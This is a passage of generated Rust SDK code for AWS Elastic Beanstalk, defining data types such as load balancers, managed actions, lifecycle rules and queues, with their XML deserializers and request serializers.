used by the Listener.</p>"] pub protocol: Option<String>, } struct ListenerDeserializer; impl ListenerDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Listener, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Listener::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Port" => { obj.port = Some(try!(IntegerDeserializer::deserialize("Port", stack))); } "Protocol" => { obj.protocol = Some(try!(StringDeserializer::deserialize("Protocol", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type LoadAverage = Vec<LoadAverageValue>; struct LoadAverageDeserializer; impl LoadAverageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadAverage, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(LoadAverageValueDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type LoadAverageValue = f64; struct LoadAverageValueDeserializer; impl LoadAverageValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadAverageValue, XmlParseError> { try!(start_element(tag_name, stack)); let obj = f64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes a LoadBalancer.</p>"] #[derive(Default,Debug,Clone)] pub struct LoadBalancer { #[doc="<p>The name of the LoadBalancer.</p>"] pub name: Option<ResourceId>, } struct LoadBalancerDeserializer; impl LoadBalancerDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadBalancer, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = LoadBalancer::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Name" => { obj.name = Some(try!(ResourceIdDeserializer::deserialize("Name", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Describes the details of a LoadBalancer.</p>"] #[derive(Default,Debug,Clone)] pub struct LoadBalancerDescription { #[doc="<p>The domain name of the LoadBalancer.</p>"] pub domain: Option<String>, #[doc="<p>A list of Listeners used by the LoadBalancer.</p>"] pub listeners: Option<LoadBalancerListenersDescription>, #[doc="<p>The name of the LoadBalancer.</p>"] pub load_balancer_name: Option<String>, } struct LoadBalancerDescriptionDeserializer; impl LoadBalancerDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadBalancerDescription, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = LoadBalancerDescription::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Domain" => { obj.domain = Some(try!(StringDeserializer::deserialize("Domain", stack))); } "Listeners" => { obj.listeners = Some(try!(LoadBalancerListenersDescriptionDeserializer::deserialize("Listeners", stack))); } "LoadBalancerName" => { obj.load_balancer_name = Some(try!(StringDeserializer::deserialize("LoadBalancerName", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type LoadBalancerList = Vec<LoadBalancer>; struct LoadBalancerListDeserializer; impl LoadBalancerListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadBalancerList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(LoadBalancerDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type LoadBalancerListenersDescription = Vec<Listener>; struct LoadBalancerListenersDescriptionDeserializer; impl LoadBalancerListenersDescriptionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<LoadBalancerListenersDescription, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ListenerDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>The record of an upcoming or in-progress managed action.</p>"] #[derive(Default,Debug,Clone)] pub struct ManagedAction { #[doc="<p>A description of the managed action.</p>"] pub action_description: Option<String>, #[doc="<p>A unique identifier for the managed action.</p>"] pub action_id: Option<String>, #[doc="<p>The type of managed action.</p>"] pub action_type: Option<ActionType>, #[doc="<p>The status of the managed action. If the action is <code>Scheduled</code>, you can apply it immediately with <a>ApplyEnvironmentManagedAction</a>.</p>"] pub status: Option<ActionStatus>, #[doc="<p>The start time of the maintenance window in which the managed action will execute.</p>"] pub window_start_time: Option<Timestamp>, } struct ManagedActionDeserializer; impl ManagedActionDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ManagedAction, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ManagedAction::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ActionDescription" => { obj.action_description = Some(try!(StringDeserializer::deserialize("ActionDescription", stack))); } "ActionId" => { obj.action_id = Some(try!(StringDeserializer::deserialize("ActionId", stack))); } "ActionType" => { obj.action_type = Some(try!(ActionTypeDeserializer::deserialize("ActionType", stack))); } "Status" => { obj.status = Some(try!(ActionStatusDeserializer::deserialize("Status", stack))); } "WindowStartTime" => { obj.window_start_time = Some(try!(TimestampDeserializer::deserialize("WindowStartTime", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>The record of a completed or failed managed action.</p>"] #[derive(Default,Debug,Clone)] pub struct ManagedActionHistoryItem { #[doc="<p>A description of the managed action.</p>"] pub action_description: Option<String>, #[doc="<p>A unique identifier for the managed action.</p>"] pub action_id: Option<String>, #[doc="<p>The type of the managed action.</p>"] pub action_type: Option<ActionType>, #[doc="<p>The date and time that the action started executing.</p>"] pub executed_time: Option<Timestamp>, #[doc="<p>If the action failed, a description of the failure.</p>"] pub failure_description: Option<String>, #[doc="<p>If the action failed, the type of failure.</p>"] pub failure_type: Option<FailureType>, #[doc="<p>The date and time that the action finished executing.</p>"] pub finished_time: Option<Timestamp>, #[doc="<p>The status of the action.</p>"] pub status: Option<ActionHistoryStatus>, } struct ManagedActionHistoryItemDeserializer; impl ManagedActionHistoryItemDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ManagedActionHistoryItem, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = ManagedActionHistoryItem::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "ActionDescription" => { obj.action_description = Some(try!(StringDeserializer::deserialize("ActionDescription", stack))); } "ActionId" => { obj.action_id = Some(try!(StringDeserializer::deserialize("ActionId", stack))); } "ActionType" => { obj.action_type = Some(try!(ActionTypeDeserializer::deserialize("ActionType", stack))); } "ExecutedTime" => { obj.executed_time = Some(try!(TimestampDeserializer::deserialize("ExecutedTime", stack))); } "FailureDescription" => { obj.failure_description = Some(try!(StringDeserializer::deserialize("FailureDescription", stack))); } "FailureType" => { obj.failure_type = Some(try!(FailureTypeDeserializer::deserialize("FailureType", stack))); } "FinishedTime" => { obj.finished_time = Some(try!(TimestampDeserializer::deserialize("FinishedTime", stack))); } "Status" => { obj.status = Some(try!(ActionHistoryStatusDeserializer::deserialize("Status", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type ManagedActionHistoryItems = Vec<ManagedActionHistoryItem>; struct ManagedActionHistoryItemsDeserializer; impl ManagedActionHistoryItemsDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ManagedActionHistoryItems, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ManagedActionHistoryItemDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } pub type ManagedActions = Vec<ManagedAction>; struct ManagedActionsDeserializer; impl ManagedActionsDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ManagedActions, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(ManagedActionDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p>A lifecycle rule that deletes application versions after the specified number of days.</p>"] #[derive(Default,Debug,Clone)] pub struct MaxAgeRule { #[doc="<p>Set to <code>true</code> to delete a version's source bundle from Amazon S3 when Elastic Beanstalk deletes the application version.</p>"] pub delete_source_from_s3: Option<BoxedBoolean>, #[doc="<p>Specify <code>true</code> to apply the rule, or <code>false</code> to disable it.</p>"] pub enabled: BoxedBoolean, #[doc="<p>Specify the number of days to retain an application versions.</p>"] pub max_age_in_days: Option<BoxedInt>, } struct MaxAgeRuleDeserializer; impl MaxAgeRuleDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<MaxAgeRule, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = MaxAgeRule::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "DeleteSourceFromS3" => { obj.delete_source_from_s3 = Some(try!(BoxedBooleanDeserializer::deserialize("DeleteSourceFromS3", stack))); } "Enabled" => { obj.enabled = try!(BoxedBooleanDeserializer::deserialize("Enabled", stack)); } "MaxAgeInDays" => { obj.max_age_in_days = Some(try!(BoxedIntDeserializer::deserialize("MaxAgeInDays", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `MaxAgeRule` contents to a `SignedRequest`. struct MaxAgeRuleSerializer; impl MaxAgeRuleSerializer { fn serialize(params: &mut Params, name: &str, obj: &MaxAgeRule) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.delete_source_from_s3 { params.put(&format!("{}{}", prefix, "DeleteSourceFromS3"), &field_value.to_string()); } params.put(&format!("{}{}", prefix, "Enabled"), &obj.enabled.to_string()); if let Some(ref field_value) = obj.max_age_in_days { params.put(&format!("{}{}", prefix, "MaxAgeInDays"), &field_value.to_string()); } } } #[doc="<p>A lifecycle rule that deletes the oldest application version when the maximum count is exceeded.</p>"] #[derive(Default,Debug,Clone)] pub struct MaxCountRule { #[doc="<p>Set to <code>true</code> to delete a version's source bundle from Amazon S3 when Elastic Beanstalk deletes the application version.</p>"] pub delete_source_from_s3: Option<BoxedBoolean>, #[doc="<p>Specify <code>true</code> to apply the rule, or <code>false</code> to disable it.</p>"] pub enabled: BoxedBoolean, #[doc="<p>Specify the maximum number of application versions to retain.</p>"] pub max_count: Option<BoxedInt>, } struct MaxCountRuleDeserializer; impl MaxCountRuleDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<MaxCountRule, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = MaxCountRule::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "DeleteSourceFromS3" => { obj.delete_source_from_s3 = Some(try!(BoxedBooleanDeserializer::deserialize("DeleteSourceFromS3", stack))); } "Enabled" => { obj.enabled = try!(BoxedBooleanDeserializer::deserialize("Enabled", stack)); } "MaxCount" => { obj.max_count = Some(try!(BoxedIntDeserializer::deserialize("MaxCount", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } /// Serialize `MaxCountRule` contents to a `SignedRequest`. struct MaxCountRuleSerializer; impl MaxCountRuleSerializer { fn serialize(params: &mut Params, name: &str, obj: &MaxCountRule) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.delete_source_from_s3 { params.put(&format!("{}{}", prefix, "DeleteSourceFromS3"), &field_value.to_string()); } params.put(&format!("{}{}", prefix, "Enabled"), &obj.enabled.to_string()); if let Some(ref field_value) = obj.max_count { params.put(&format!("{}{}", prefix, "MaxCount"), &field_value.to_string()); } } } pub type MaxRecords = i64; pub type Message = String; struct MessageDeserializer; impl MessageDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Message, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type NextToken = String; struct NextTokenDeserializer; impl NextTokenDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<NextToken, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type NonEmptyString = String; pub type NullableDouble = f64; struct NullableDoubleDeserializer; impl NullableDoubleDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<NullableDouble, XmlParseError> { try!(start_element(tag_name, stack)); let obj = f64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type NullableInteger = i64; struct NullableIntegerDeserializer; impl NullableIntegerDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<NullableInteger, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type NullableLong = i64; struct NullableLongDeserializer; impl NullableLongDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<NullableLong, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type OptionNamespace = String; struct OptionNamespaceDeserializer; impl OptionNamespaceDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<OptionNamespace, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type OptionRestrictionMaxLength = i64; struct OptionRestrictionMaxLengthDeserializer; impl OptionRestrictionMaxLengthDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<OptionRestrictionMaxLength, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type OptionRestrictionMaxValue = i64; struct OptionRestrictionMaxValueDeserializer; impl OptionRestrictionMaxValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<OptionRestrictionMaxValue, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } pub type OptionRestrictionMinValue = i64; struct OptionRestrictionMinValueDeserializer; impl OptionRestrictionMinValueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<OptionRestrictionMinValue, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>A regular expression representing a restriction on a string configuration option value.</p>"] #[derive(Default,Debug,Clone)] pub struct OptionRestrictionRegex { #[doc="<p>A unique name representing this regular expression.</p>"] pub label: Option<RegexLabel>, #[doc="<p>The regular expression pattern that a string configuration option value with this restriction must match.</p>"] pub pattern: Option<RegexPattern>, } struct OptionRestrictionRegexDeserializer; impl OptionRestrictionRegexDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<OptionRestrictionRegex, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = OptionRestrictionRegex::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Label" => { obj.label = Some(try!(RegexLabelDeserializer::deserialize("Label", stack))); } "Pattern" => { obj.pattern = Some(try!(RegexPatternDeserializer::deserialize("Pattern", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>A specification identifying an individual configuration option.</p>"] #[derive(Default,Debug,Clone)] pub struct OptionSpecification { #[doc="<p>A unique namespace identifying the option's associated AWS resource.</p>"] pub namespace: Option<OptionNamespace>, #[doc="<p>The name of the configuration option.</p>"] pub option_name: Option<ConfigurationOptionName>, #[doc="<p>A unique resource name for a time-based scaling configuration option.</p>"] pub resource_name: Option<ResourceName>, } /// Serialize `OptionSpecification` contents to a `SignedRequest`. struct OptionSpecificationSerializer; impl OptionSpecificationSerializer { fn serialize(params: &mut Params, name: &str, obj: &OptionSpecification) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.namespace { params.put(&format!("{}{}", prefix, "Namespace"), &field_value); } if let Some(ref field_value) = obj.option_name { params.put(&format!("{}{}", prefix, "OptionName"), &field_value); } if let Some(ref field_value) = obj.resource_name { params.put(&format!("{}{}", prefix, "ResourceName"), &field_value); } } } pub type OptionsSpecifierList = Vec<OptionSpecification>; /// Serialize `OptionsSpecifierList` contents to a `SignedRequest`. struct OptionsSpecifierListSerializer; impl OptionsSpecifierListSerializer { fn serialize(params: &mut Params, name: &str, obj: &OptionsSpecifierList) { for (index, obj) in obj.iter().enumerate() { let key = format!("{}.member.{}", name, index+1); OptionSpecificationSerializer::serialize(params, &key, obj); } } } #[doc="<p>Describes a queue.</p>"] #[derive(Default,Debug,Clone)] pub struct Queue { #[doc="<p>The name of the queue.</p>"] pub name: Option<String>, #[doc="<p>The URL of the queue.</p>"] pub url: Option<String>, } struct QueueDeserializer; impl QueueDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<Queue, XmlParseError> { try!(start_element(tag_name, stack)); let mut obj = Queue::default(); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { ref name, .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { match &name[..] { "Name" => { obj.name = Some(try!(StringDeserializer::deserialize("Name", stack))); } "URL" => { obj.url = Some(try!(StringDeserializer::deserialize("URL", stack))); } _ => skip_tree(stack), } }, DeserializerNext::Close => break, DeserializerNext::Skip => { stack.next(); }, } } try!(end_element(tag_name, stack)); Ok(obj) } } pub type QueueList = Vec<Queue>; struct QueueListDeserializer; impl QueueListDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<QueueList, XmlParseError> { let mut obj = vec![]; try!(start_element(tag_name, stack)); loop { let next_event = match stack.peek() { Some(&Ok(XmlEvent::EndElement { .. })) => DeserializerNext::Close, Some(&Ok(XmlEvent::StartElement { ref name, .. })) => DeserializerNext::Element(name.local_name.to_owned()), _ => DeserializerNext::Skip, }; match next_event { DeserializerNext::Element(name) => { if name == "member" { obj.push(try!(QueueDeserializer::deserialize("member", stack))); } else { skip_tree(stack); } }, DeserializerNext::Close => { try!(end_element(tag_name, stack)); break; } DeserializerNext::Skip => { stack.next(); }, } } Ok(obj) } } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct RebuildEnvironmentMessage { #[doc="<p>The ID of the environment to rebuild.</p> <p> Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the environment to rebuild.</p> <p> Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, } /// Serialize `RebuildEnvironmentMessage` contents to a `SignedRequest`. struct RebuildEnvironmentMessageSerializer; impl RebuildEnvironmentMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &RebuildEnvironmentMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } pub type RefreshedAt = String; struct RefreshedAtDeserializer; impl RefreshedAtDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RefreshedAt, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type RegexLabel = String; struct RegexLabelDeserializer; impl RegexLabelDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RegexLabel, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type RegexPattern = String; struct RegexPatternDeserializer; impl RegexPatternDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RegexPattern, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type RequestCount = i64; struct RequestCountDeserializer; impl RequestCountDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RequestCount, XmlParseError> { try!(start_element(tag_name, stack)); let obj = i64::from_str(try!(characters(stack)).as_ref()).unwrap(); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p>Request to retrieve logs from an environment and store them in your Elastic Beanstalk storage bucket.</p>"] #[derive(Default,Debug,Clone)] pub struct RequestEnvironmentInfoMessage { #[doc="<p>The ID of the environment of the requested data.</p> <p>If no such environment is found, <code>RequestEnvironmentInfo</code> returns an <code>InvalidParameterValue</code> error. </p> <p>Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the environment of the requested data.</p> <p>If no such environment is found, <code>RequestEnvironmentInfo</code> returns an <code>InvalidParameterValue</code> error. </p> <p>Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, #[doc="<p>The type of information to request.</p>"] pub info_type: EnvironmentInfoType, } /// Serialize `RequestEnvironmentInfoMessage` contents to a `SignedRequest`. struct RequestEnvironmentInfoMessageSerializer; impl RequestEnvironmentInfoMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &RequestEnvironmentInfoMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } params.put(&format!("{}{}", prefix, "InfoType"), &obj.info_type); } } pub type RequestId = String; struct RequestIdDeserializer; impl RequestIdDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<RequestId, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ResourceId = String; struct ResourceIdDeserializer; impl ResourceIdDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ResourceId, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } pub type ResourceName = String; struct ResourceNameDeserializer; impl ResourceNameDeserializer { #[allow(unused_variables)] fn deserialize<'a, T: Peek + Next>(tag_name: &str, stack: &mut T) -> Result<ResourceName, XmlParseError> { try!(start_element(tag_name, stack)); let obj = try!(characters(stack)); try!(end_element(tag_name, stack)); Ok(obj) } } #[doc="<p/>"] #[derive(Default,Debug,Clone)] pub struct RestartAppServerMessage { #[doc="<p>The ID of the environment to restart the server for.</p> <p> Condition: You must specify either this or an EnvironmentName, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_id: Option<EnvironmentId>, #[doc="<p>The name of the environment to restart the server for.</p> <p> Condition: You must specify either this or an EnvironmentId, or both. If you do not specify either, AWS Elastic Beanstalk returns <code>MissingRequiredParameter</code> error. </p>"] pub environment_name: Option<EnvironmentName>, } /// Serialize `RestartAppServerMessage` contents to a `SignedRequest`. struct RestartAppServerMessageSerializer; impl RestartAppServerMessageSerializer { fn serialize(params: &mut Params, name: &str, obj: &RestartAppServerMessage) { let mut prefix = name.to_string(); if prefix != "" { prefix.push_str("."); } if let Some(ref field_value) = obj.environment_id { params.put(&format!("{}{}", prefix, "EnvironmentId"), &field_value); } if let Some(ref field_value) = obj.environment_name { params.put(&format!("{}{}", prefix, "EnvironmentName"), &field_value); } } } 